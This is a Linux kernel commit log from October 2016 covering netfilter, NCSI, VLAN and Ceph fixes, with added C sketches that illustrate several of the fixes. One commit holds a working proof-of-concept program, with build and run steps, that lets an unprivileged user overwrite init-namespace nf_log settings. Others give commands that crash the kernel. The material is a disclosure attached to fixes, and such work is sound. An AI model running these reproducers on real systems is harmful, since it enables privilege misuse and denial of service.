  1. 11 Oct, 2016 1 commit
  2. 08 Oct, 2016 4 commits
  3. 07 Oct, 2016 4 commits
  4. 06 Oct, 2016 15 commits
  5. 05 Oct, 2016 2 commits
  6. 04 Oct, 2016 13 commits
    • netfilter: nft_limit: fix divided by zero panic · 2fa46c13
      Liping Zhang authored
      After I input the following nftables rule, a panic happened on my system:
        # nft add rule filter OUTPUT limit rate 0xf00000000 bytes/second
      
        divide error: 0000 [#1] SMP
        [ ... ]
        RIP: 0010:[<ffffffffa059035e>]  [<ffffffffa059035e>]
        nft_limit_pkt_bytes_eval+0x2e/0xa0 [nft_limit]
        Call Trace:
        [<ffffffffa05721bb>] nft_do_chain+0xfb/0x4e0 [nf_tables]
        [<ffffffffa044f236>] ? nf_nat_setup_info+0x96/0x480 [nf_nat]
        [<ffffffff81753767>] ? ipt_do_table+0x327/0x610
        [<ffffffffa044f677>] ? __nf_nat_alloc_null_binding+0x57/0x80 [nf_nat]
        [<ffffffffa058b21f>] nft_ipv4_output+0xaf/0xd0 [nf_tables_ipv4]
        [<ffffffff816f4aa2>] nf_iterate+0x62/0x80
        [<ffffffff816f4b33>] nf_hook_slow+0x73/0xd0
        [<ffffffff81703d0d>] __ip_local_out+0xcd/0xe0
        [<ffffffff81701d90>] ? ip_forward_options+0x1b0/0x1b0
        [<ffffffff81703d3c>] ip_local_out+0x1c/0x40
      
      This is because the divisor is 64-bit but is treated as a 32-bit integer,
      so 0xf00000000 is truncated to zero, i.e. the divisor becomes 0.
      Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com>
      Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
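
      The truncation described in this commit can be reproduced in user space.
      The sketch below is not the nft_limit code: rate_as_u32() and
      div_u64_checked() are hypothetical helpers that only show why
      0xf00000000 turns into a zero divisor once it is squeezed into 32 bits,
      and why keeping the divisor 64-bit avoids that.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: store a 64-bit rate in a 32-bit variable. */
static uint32_t rate_as_u32(uint64_t rate)
{
	return (uint32_t)rate;	/* only the low 32 bits survive */
}

/* Hypothetical helper: divide by a 64-bit divisor, refusing zero. */
static int div_u64_checked(uint64_t dividend, uint64_t divisor, uint64_t *quot)
{
	assert(quot != NULL);
	if (divisor == 0)
		return -1;	/* an unchecked division would trap here */
	*quot = dividend / divisor;
	return 0;
}
```

      Passing rate_as_u32(0xf00000000ULL) as the divisor is rejected, while
      passing the untruncated 64-bit value divides normally.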
    • netfilter: fix namespace handling in nf_log_proc_dostring · dbb5918c
      Jann Horn authored
      nf_log_proc_dostring() used current's network namespace instead of the one
      corresponding to the sysctl file the write was performed on. Because the
      permission check happens at open time and the nf_log files in namespaces
      are accessible for the namespace owner, this can be abused by an
      unprivileged user to effectively write to the init namespace's nf_log
      sysctls.
      
      Stash the "struct net *" in extra2 - data and extra1 are already used.
      
      Repro code:
      
      #define _GNU_SOURCE
      #include <stdlib.h>
      #include <sched.h>
      #include <err.h>
      #include <sys/mount.h>
      #include <sys/types.h>
      #include <sys/wait.h>
      #include <fcntl.h>
      #include <unistd.h>
      #include <string.h>
      #include <stdio.h>
      
      char child_stack[1000000];
      
      uid_t outer_uid;
      gid_t outer_gid;
      int stolen_fd = -1;
      
      void writefile(char *path, char *buf) {
              int fd = open(path, O_WRONLY);
              if (fd == -1)
                      err(1, "unable to open thing");
              if (write(fd, buf, strlen(buf)) != strlen(buf))
                      err(1, "unable to write thing");
              close(fd);
      }
      
      int child_fn(void *p_) {
              if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
                        NULL))
                      err(1, "mount");
      
              /* Yes, we need to set the maps for the net sysctls to recognize us
               * as namespace root.
               */
              char buf[1000];
              sprintf(buf, "0 %d 1\n", (int)outer_uid);
              writefile("/proc/1/uid_map", buf);
              writefile("/proc/1/setgroups", "deny");
              sprintf(buf, "0 %d 1\n", (int)outer_gid);
              writefile("/proc/1/gid_map", buf);
      
              stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
              if (stolen_fd == -1)
                      err(1, "open nf_log");
              return 0;
      }
      
      int main(void) {
              outer_uid = getuid();
              outer_gid = getgid();
      
              int child = clone(child_fn, child_stack + sizeof(child_stack),
                                CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
                                |CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
              if (child == -1)
                      err(1, "clone");
              int status;
              if (wait(&status) != child)
                      err(1, "wait");
              if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
                      errx(1, "child exit status bad");
      
              char *data = "NONE";
              if (write(stolen_fd, data, strlen(data)) != strlen(data))
                      err(1, "write");
              return 0;
      }
      
      Repro:
      
      $ gcc -Wall -o attack attack.c -std=gnu99
      $ cat /proc/sys/net/netfilter/nf_log/2
      nf_log_ipv4
      $ ./attack
      $ cat /proc/sys/net/netfilter/nf_log/2
      NONE
      
      Because this looks like an issue with very low severity, I'm sending it to
      the public list directly.
      Signed-off-by: Jann Horn <jann@thejh.net>
      Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
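
      The idea of the fix (look up the namespace from the table entry rather
      than from the writing process) can be sketched in user space. Everything
      here is a hypothetical stand-in: struct fake_net, struct fake_ctl_table
      and both setter functions are invented for illustration and are not the
      kernel's definitions.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical stand-ins; these are not the kernel's definitions. */
struct fake_net {
	char logger[16];
};

struct fake_ctl_table {
	void *data;
	void *extra1;
	void *extra2;	/* owning namespace, stashed at registration time */
};

/* Namespace of whichever process performs the write(). */
static struct fake_net *fake_current_net;

/* Pre-fix behaviour: the writer's namespace is modified. */
static void set_logger_by_writer(const struct fake_ctl_table *t, const char *name)
{
	(void)t;
	snprintf(fake_current_net->logger, sizeof(fake_current_net->logger),
		 "%s", name);
}

/* Post-fix behaviour: the namespace that owns the file is modified. */
static void set_logger_by_owner(const struct fake_ctl_table *t, const char *name)
{
	struct fake_net *net = t->extra2;

	assert(net != NULL);
	snprintf(net->logger, sizeof(net->logger), "%s", name);
}
```

      With a table entry opened in a child namespace and a writer living in
      the init namespace, set_logger_by_writer() changes the init namespace,
      whereas set_logger_by_owner() only touches the child.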
    • net/ncsi: Introduce ncsi_stop_dev() · c0cd1ba4
      Gavin Shan authored
      This introduces ncsi_stop_dev(), the counterpart to ncsi_start_dev(),
      to stop the NCSI device so that it can be re-enabled in the future. This
      API should be called when the network device driver is about to shut
      down the device. The function does three things: it stops the channel
      monitoring, resets the channels to the inactive state, and reports
      NCSI link down.
      Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
      Reviewed-by: Joel Stanley <joel@jms.id.au>
      Signed-off-by: David S. Miller <davem@davemloft.net>
    • net/ncsi: Rework the channel monitoring · 83afdc6a
      Gavin Shan authored
      The original NCSI channel monitoring was implemented based on a
      backoff algorithm: the GLS response should be received within the
      specified interval. Otherwise, the channel is regarded as dead
      and failover should take place if the current channel is an active one.
      There are several problems in the implementation: (A) On BCM5718,
      we found that when the IID (Instance ID) in the GLS command packet
      changes from 255 to 1, the response corresponding to IID#1 never
      comes in. It means we cannot fairly judge the channel to be dead
      when a single response is missed. (B) The code's readability should
      be improved. (C) We should do failover when the current channel is
      the active one, and the channel monitoring should be marked as
      disabled before doing failover.
      
      This reworks the channel monitoring to address all of the above issues.
      The fields for channel monitoring are put into a separate struct
      and the states of channel monitoring are predefined. The channel
      is regarded as alive if the network controller responds to one or
      both of two GLS commands within 5 seconds.
      Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
      Reviewed-by: Joel Stanley <joel@jms.id.au>
      Signed-off-by: David S. Miller <davem@davemloft.net>
    • net/ncsi: Allow to extend NCSI request properties · a0509cbe
      Gavin Shan authored
      There is only one NCSI request property for now: whether the response
      to the sent command needs to drive the workqueue or not. So we had one
      field (@driven) for that purpose, which left no flexibility to extend
      the NCSI request properties.
      
      This replaces @driven with @flags and @req_flags in the NCSI request
      and the NCSI command argument struct. Each bit of the newly introduced
      fields can be used for one property. No functional changes introduced.
      Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
      Reviewed-by: Joel Stanley <joel@jms.id.au>
      Signed-off-by: David S. Miller <davem@davemloft.net>
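
      A minimal sketch of the bit-per-property layout this commit describes.
      The flag names and struct fake_request are hypothetical; the commit
      message does not list the actual flag names, and the second flag exists
      only to show how a later property could be added.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical flag names; only the bit-per-property idea is from the text. */
#define REQ_FLAG_EVENT_DRIVEN	(1u << 0)
#define REQ_FLAG_EXAMPLE	(1u << 1)	/* illustrative future property */

struct fake_request {
	unsigned int flags;	/* replaces a single boolean field */
};

static void req_set_flag(struct fake_request *r, unsigned int flag)
{
	assert(r != NULL);
	r->flags |= flag;
}

static bool req_has_flag(const struct fake_request *r, unsigned int flag)
{
	return (r->flags & flag) != 0;
}
```

      Adding a property then costs one new bit definition rather than a new
      struct field.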
    • net/ncsi: Rework request index allocation · a15af54f
      Gavin Shan authored
      The NCSI request index (struct ncsi_request::id) is put into the instance
      ID (IID) field when sending an NCSI command packet. By design, the
      available IDs are handed out in round-robin fashion. @ndp->request_id was
      introduced to represent the next available ID, but it has been used
      as the number of successively allocated IDs, which breaks the round-robin
      design. Besides, we shouldn't put 0 into the NCSI command packet's IID
      field, meaning ID#0 should be reserved according to section 6.3.1.1
      of the NCSI spec (v1.1.0).
      
      This fixes the above two issues. With it applied, the available IDs will
      be assigned in round-robin fashion and ID#0 won't be assigned.
      Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
      Reviewed-by: Joel Stanley <joel@jms.id.au>
      Signed-off-by: David S. Miller <davem@davemloft.net>
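
      Round-robin allocation with ID 0 reserved could look roughly like the
      sketch below. It is not the code from net/ncsi: struct id_pool and its
      functions are hypothetical, and the 1..255 range is an assumption based
      on the IID being an 8-bit field.

```c
#include <assert.h>
#include <stdbool.h>
#include <string.h>

#define REQ_ID_MIN	1	/* ID 0 is reserved and never handed out */
#define REQ_ID_MAX	255	/* assumed upper bound of the IID field */

struct id_pool {
	bool used[REQ_ID_MAX + 1];
	int next_id;		/* next candidate, always in [MIN, MAX] */
};

static void id_pool_init(struct id_pool *p)
{
	memset(p->used, 0, sizeof(p->used));
	p->next_id = REQ_ID_MIN;
}

static int id_next(int id)
{
	return id == REQ_ID_MAX ? REQ_ID_MIN : id + 1;	/* wrap past 0 */
}

/* Returns an unused ID, scanning forward from next_id; -1 if none left. */
static int id_alloc(struct id_pool *p)
{
	int id = p->next_id;

	for (int n = 0; n < REQ_ID_MAX; n++, id = id_next(id)) {
		if (!p->used[id]) {
			p->used[id] = true;
			p->next_id = id_next(id);
			return id;
		}
	}
	return -1;
}

static void id_free(struct id_pool *p, int id)
{
	assert(id >= REQ_ID_MIN && id <= REQ_ID_MAX);
	p->used[id] = false;
}
```

      Because next_id always moves forward, a freed ID is not reused until the
      scan has wrapped around, which is the round-robin property the commit
      message asks for.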
    • net/ncsi: Don't probe on the reserved channel ID (0x1f) · 55e02d08
      Gavin Shan authored
      We needn't send the CIS (Clear Initial State) command to the NCSI
      reserved channel (0x1f) during enumeration, since we shouldn't receive
      a valid response from CIS on NCSI channel 0x1f.
      Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
      Reviewed-by: Joel Stanley <joel@jms.id.au>
      Signed-off-by: David S. Miller <davem@davemloft.net>
    • net/ncsi: Introduce NCSI_RESERVED_CHANNEL · bc7e0f50
      Gavin Shan authored
      This defines NCSI_RESERVED_CHANNEL as the reserved NCSI channel
      ID (0x1f). No logical changes introduced.
      Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
      Reviewed-by: Joel Stanley <joel@jms.id.au>
      Signed-off-by: David S. Miller <davem@davemloft.net>
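
      Skipping the reserved ID during enumeration can be sketched as follows.
      Only NCSI_RESERVED_CHANNEL (0x1f) comes from the commit messages;
      probe_targets() is a hypothetical helper, and the assumption that
      channel IDs span 0 to 0x1f is mine.

```c
#include <assert.h>
#include <stddef.h>

#define NCSI_RESERVED_CHANNEL	0x1f

/* Fill ids[] with the channel IDs worth probing; returns how many. */
static size_t probe_targets(unsigned char *ids, size_t cap)
{
	size_t n = 0;

	assert(ids != NULL);
	for (unsigned int id = 0; id <= NCSI_RESERVED_CHANNEL; id++) {
		if (id == NCSI_RESERVED_CHANNEL)
			continue;	/* never probe the reserved ID */
		if (n == cap)
			break;
		ids[n++] = (unsigned char)id;
	}
	return n;
}
```

      Using the named constant in the loop keeps the magic number 0x1f in a
      single place.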
    • net/ncsi: Avoid unused-value build warning from ia64-linux-gcc · d8cedaab
      Gavin Shan authored
      xchg() is used to set the NCSI channel's state in order to get consistent
      access to the state. xchg()'s return value should be used; otherwise,
      a build warning is raised (with -Wunused-value), as the message below
      indicates. It was reported by ia64-linux-gcc (GCC) 4.9.0.
      
       net/ncsi/ncsi-manage.c: In function 'ncsi_channel_monitor':
       arch/ia64/include/uapi/asm/cmpxchg.h:56:2: warning: value computed is \
       not used [-Wunused-value]
        ((__typeof__(*(ptr))) __xchg((unsigned long) (x), (ptr), sizeof(*(ptr))))
         ^
       net/ncsi/ncsi-manage.c:202:3: note: in expansion of macro 'xchg'
        xchg(&nc->state, NCSI_CHANNEL_INACTIVE);
      
      This removes the atomic access to the NCSI channel's state to avoid the
      above build warning. We have to hold the channel's lock when its state
      is read or updated. No functional changes introduced.
      Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
      Reviewed-by: Joel Stanley <joel@jms.id.au>
      Signed-off-by: David S. Miller <davem@davemloft.net>
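
      The locking rule stated in this commit (hold the channel's lock whenever
      the state is read or updated) can be illustrated in user space. This is
      only an analogy: a pthread mutex stands in for the kernel lock, and
      struct fake_channel, the state names and both accessors are hypothetical.

```c
#include <assert.h>
#include <pthread.h>
#include <stddef.h>

enum chan_state { CHAN_INACTIVE, CHAN_ACTIVE };	/* hypothetical states */

struct fake_channel {
	pthread_mutex_t lock;
	enum chan_state state;	/* only touched with lock held */
};

static void chan_set_state(struct fake_channel *c, enum chan_state s)
{
	assert(c != NULL);
	pthread_mutex_lock(&c->lock);
	c->state = s;	/* plain store, so no exchanged value goes unused */
	pthread_mutex_unlock(&c->lock);
}

static enum chan_state chan_get_state(struct fake_channel *c)
{
	enum chan_state s;

	assert(c != NULL);
	pthread_mutex_lock(&c->lock);
	s = c->state;
	pthread_mutex_unlock(&c->lock);
	return s;
}
```

      Funnelling every access through these two helpers is one way to make the
      "lock held" requirement hard to forget.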
    • net: Add netdev all_adj_list refcnt propagation to fix panic · 93409033
      Andrew Collins authored
      This is a respin of a patch to fix a relatively easily reproducible kernel
      panic related to the all_adj_list handling for netdevs in recent kernels.
      
      The following sequence of commands will reproduce the issue:
      
      ip link add link eth0 name eth0.100 type vlan id 100
      ip link add link eth0 name eth0.200 type vlan id 200
      ip link add name testbr type bridge
      ip link set eth0.100 master testbr
      ip link set eth0.200 master testbr
      ip link add link testbr mac0 type macvlan
      ip link delete dev testbr
      
      This creates an upper/lower tree of (excuse the poor ASCII art):
      
                  /---eth0.100-eth0
      mac0-testbr-
                  \---eth0.200-eth0
      
      When testbr is deleted, the all_adj_lists are walked, and eth0 is deleted twice from
      the mac0 list. Unfortunately, during setup in __netdev_upper_dev_link, only one
      reference to eth0 is added, so this results in a panic.
      
      This change adds reference count propagation so things are handled properly.
      
      Matthias Schiffer reported a similar crash in batman-adv:
      
      https://github.com/freifunk-gluon/gluon/issues/680
      https://www.open-mesh.org/issues/247
      
      which this patch also seems to resolve.
      Signed-off-by: Andrew Collins <acollins@cradlepoint.com>
      Signed-off-by: David S. Miller <davem@davemloft.net>
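
      The effect of propagating reference counts can be modelled with a toy
      adjacency list. This is a simplified sketch and not the netdev code:
      struct adj_list, adj_get(), adj_put() and adj_propagate() are
      hypothetical, and devices are represented by plain integers.

```c
#include <assert.h>
#include <stddef.h>

#define MAX_ADJ 8

/* Hypothetical, simplified adjacency list: device id plus refcount. */
struct adj_entry { int dev; int ref_nr; };
struct adj_list { struct adj_entry e[MAX_ADJ]; size_t n; };

static struct adj_entry *adj_find(struct adj_list *l, int dev)
{
	for (size_t i = 0; i < l->n; i++)
		if (l->e[i].dev == dev)
			return &l->e[i];
	return NULL;
}

/* Take ref_nr references on dev, creating the entry on first use. */
static void adj_get(struct adj_list *l, int dev, int ref_nr)
{
	struct adj_entry *a = adj_find(l, dev);

	if (!a) {
		assert(l->n < MAX_ADJ);
		a = &l->e[l->n++];
		a->dev = dev;
		a->ref_nr = 0;
	}
	a->ref_nr += ref_nr;
}

/* Drop ref_nr references; returns what is left, or -1 on underflow. */
static int adj_put(struct adj_list *l, int dev, int ref_nr)
{
	struct adj_entry *a = adj_find(l, dev);

	if (!a || a->ref_nr < ref_nr)
		return -1;	/* models the double delete from the report */
	a->ref_nr -= ref_nr;
	return a->ref_nr;
}

/* Link upper on top of lower: inherit each entry with its full count. */
static void adj_propagate(struct adj_list *upper, const struct adj_list *lower)
{
	for (size_t i = 0; i < lower->n; i++)
		adj_get(upper, lower->e[i].dev, lower->e[i].ref_nr);
}
```

      In the scenario from the commit message, eth0 is reachable from testbr
      through two VLAN devices, so its count there is 2. Propagating that
      count to mac0 lets both later deletions succeed; inheriting only one
      reference would make the second deletion underflow.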
    • net: skbuff: Limit skb_vlan_pop/push() to expect skb->data at mac header · b6a79208
      Shmulik Ladkani authored
      skb_vlan_pop/push were too generic, trying to support the cases where
      skb->data is at mac header, and cases where skb->data is arbitrarily
      elsewhere.
      
      Supporting an arbitrary skb->data was complex and bogus:
       - It failed to unwind skb->data to its original location post actual
         pop/push.
         (Also, the semantics of unwinding are not well defined: if data was
          inside the eth header, the same offset from the start must be used;
          but if data was at the network header or beyond, the original offset
          must be adjusted according to the push/pull)
       - It mangled the rcsum post actual push/pop, without taking into account
         that the eth bytes might already have been pulled out of the csum.
      
      Most callers (ovs, bpf) already had their skb->data at mac_header upon
      invoking skb_vlan_pop/push.
      The last caller that failed to do so (act_vlan) has recently been fixed.
      
      Therefore, to simplify things, no longer support arbitrary skb->data
      inputs for skb_vlan_pop/push().
      
      skb->data is expected to be exactly at mac_header; WARN otherwise.
      Signed-off-by: Shmulik Ladkani <shmulik.ladkani@gmail.com>
      Cc: Daniel Borkmann <daniel@iogearbox.net>
      Cc: Pravin Shelar <pshelar@ovn.org>
      Cc: Jiri Pirko <jiri@mellanox.com>
      Signed-off-by: David S. Miller <davem@davemloft.net>
    • net/sched: act_vlan: Push skb->data to mac_header prior calling skb_vlan_*() functions · f39acc84
      Shmulik Ladkani authored
      Generic skb_vlan_push/skb_vlan_pop functions don't properly handle the
      case where the input skb data pointer does not point at the mac header:
      
      - They're doing push/pop, but fail to properly unwind data back to its
        original location.
        For example, in the skb_vlan_push case, any subsequent
        'skb_push(skb, skb->mac_len)' calls make the skb->data point 4 bytes
        BEFORE start of frame, leading to bogus frames that may be transmitted.
      
      - They update rcsum per the added/removed 4 bytes tag.
        Alas if data is originally after the vlan/eth headers, then these
        bytes were already pulled out of the csum.
      
      OTOH, calling skb_vlan_push/skb_vlan_pop with skb->data at mac_header
      presents no issues.
      
      act_vlan is the only caller of skb_vlan_*() that has skb->data pointing
      at the network header (upon ingress).
      Other callers (ovs, bpf) already adjust skb->data to mac_header.
      
      This patch fixes act_vlan to point to the mac_header prior to calling
      skb_vlan_*() functions, as other callers do.
      Signed-off-by: Shmulik Ladkani <shmulik.ladkani@gmail.com>
      Cc: Daniel Borkmann <daniel@iogearbox.net>
      Cc: Pravin Shelar <pshelar@ovn.org>
      Cc: Jiri Pirko <jiri@mellanox.com>
      Signed-off-by: David S. Miller <davem@davemloft.net>
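
      The "move data to the mac header, call the VLAN helper, move it back"
      pattern can be modelled with offsets alone. The sketch below is
      hypothetical throughout: struct fake_skb, fake_vlan_op() and
      act_vlan_sketch() are invented names, and checksum handling and the
      actual tag insertion or removal are deliberately left out.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical model of an skb: just offsets into the frame. */
struct fake_skb {
	size_t mac_header;	/* offset of the Ethernet header */
	size_t mac_len;		/* length of the link-layer header */
	size_t data;		/* offset that skb->data points at */
};

/* Stand-in for skb_vlan_push/pop: insists on data == mac_header. */
static int fake_vlan_op(const struct fake_skb *skb)
{
	return skb->data == skb->mac_header ? 0 : -1;
}

/* Sketch of a caller that may be entered with data at the network header. */
static int act_vlan_sketch(struct fake_skb *skb)
{
	bool at_network;
	int err;

	assert(skb != NULL);
	at_network = skb->data == skb->mac_header + skb->mac_len;
	if (at_network)
		skb->data -= skb->mac_len;	/* push back to the mac header */
	err = fake_vlan_op(skb);
	if (at_network)
		skb->data += skb->mac_len;	/* restore the caller's view */
	return err;
}
```

      Calling fake_vlan_op() directly with data at the network header fails,
      while act_vlan_sketch() succeeds and leaves data where the caller had it.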
    • skb_splice_bits(): get rid of callback · 25869262
      Al Viro authored
      Since pipe_lock is the outermost now, we don't need to drop/regain
      socket locks around the call of splice_to_pipe() from skb_splice_bits(),
      which kills the need to have a socket-specific callback; we can just
      call splice_to_pipe() and be done with that.
      Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
  7. 03 Oct, 2016 1 commit
    • libceph: ceph_build_auth() doesn't need ceph_auth_build_hello() · 464691bd
      Ilya Dryomov authored
      A static bug finder (EBA) reported the following on Linux 4.7:
      
          Double lock in net/ceph/auth.c
          second lock at 108: mutex_lock(& ac->mutex); [ceph_auth_build_hello]
          after calling from 263: ret = ceph_auth_build_hello(ac, msg_buf, msg_len);
          if ! ac->protocol -> true at 262
          first lock at 261: mutex_lock(& ac->mutex); [ceph_build_auth]
      
      ceph_auth_build_hello() is never called, because the protocol is always
      initialized, whether we are checking existing tickets (in delayed_work())
      or getting new ones after invalidation (in invalidate_authorizer()).
      Reported-by: Iago Abal <iari@itu.dk>
      Signed-off-by: Ilya Dryomov <idryomov@gmail.com>